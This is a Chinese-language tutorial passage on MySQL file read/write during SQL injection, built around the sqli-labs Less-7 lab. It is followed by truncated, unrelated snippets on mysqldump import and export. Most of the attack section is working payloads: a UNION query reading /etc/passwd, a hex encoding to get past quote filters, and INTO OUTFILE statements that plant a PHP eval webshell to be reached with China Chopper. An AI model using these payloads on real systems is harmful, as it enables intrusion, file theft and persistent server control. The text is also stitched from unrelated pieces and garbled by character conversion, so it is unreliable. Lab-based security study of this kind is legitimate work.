load_file(file_name)函式的作用是讀取磁碟檔案,並返回該檔案的內容作為乙個字串。
load_file(file_name)函式使用條件:
欲讀取檔案必須在伺服器上。
必須指定檔案完整的路徑。
欲讀取檔案必須小於max_allowed_packet。
如果上述任何乙個條件不滿足,函式返回空null。
上述四個條件中,最難滿足的就是許可權這一條件。
sql語句如下:
union select 1 , load_file('/etc/passwd') , 3 , 4 , 5 , 6 %23
如果程式防注入語句不允許出現單引號,可以使用以下語句繞過:
union select 1 , load_file(0x2f6563742f706173737764) , 3 , 4 , 5 , 6 %23
0x2f6563742f706173737764是/etc/passwd的十六進製制轉換的結果。
與load_file()函式一樣,into outfile可以向磁碟寫入檔案。
select something into outfile 'file_name'
要求如下:
寫入檔案:
select '<?php phpinfo();?>' into outfile 'c:\wwwroot\1.php'
select char(99,58,92,50,46,116,120,116) into outfile 'c:\wwwroot\1.php'
select <?php @eval($_post[「mima」])?> into outfile 「c:\\phpnow\\htdocs\\test.php」
我們以less-7為例來學習mysql檔案匯入匯出操作。
less-7比較特殊,首先我們檢視原始碼。
$sql="select * from users where id=(('$id')) limit 0,1";
所以我們需要對對 id 引數進行了 『))的處理。
之前的order by num和union等操作我們這裡就不做介紹了。
我們直接執行into outfile寫檔案操作。
如圖所示,我們成功在磁碟下建立了xiong.txt檔案。
我們寫入了一句話木馬在檔案中,然後直接連線菜刀即可。
Mysql匯出表 匯入表相關操作
匯出資料 set gtid purged off注意此引數新增後匯出的指令碼帶binlog,否則主從同步會出問題 1 備份全部資料庫的資料和表結構 mysqldump uroot ppassword a all.sql set gtid purged off 2 只備份表結構,不備份資料 mysql...
MySQL 匯入匯出基本操作
一.mysql的命令列模式的設定 桌面 我的電腦 屬性 環境變數 編輯 path path mysql bin 其中path為mysql的安裝路徑。二。進入mysql 的方法 1.c mysql h hostname u username p 按enter鍵,等待然後輸入密碼。這裡hostname為...
mysql 匯入匯出 mysql匯入匯出sql檔案
window下 1.匯出整個資料庫 mysqldump u 使用者名稱 p 資料庫名 匯出的檔名 mysqldump u dbuser p dbname dbname.sql 2.匯出乙個表 mysqldump u 使用者名稱 p 資料庫名 表名 匯出的檔名 mysqldump u dbuser p...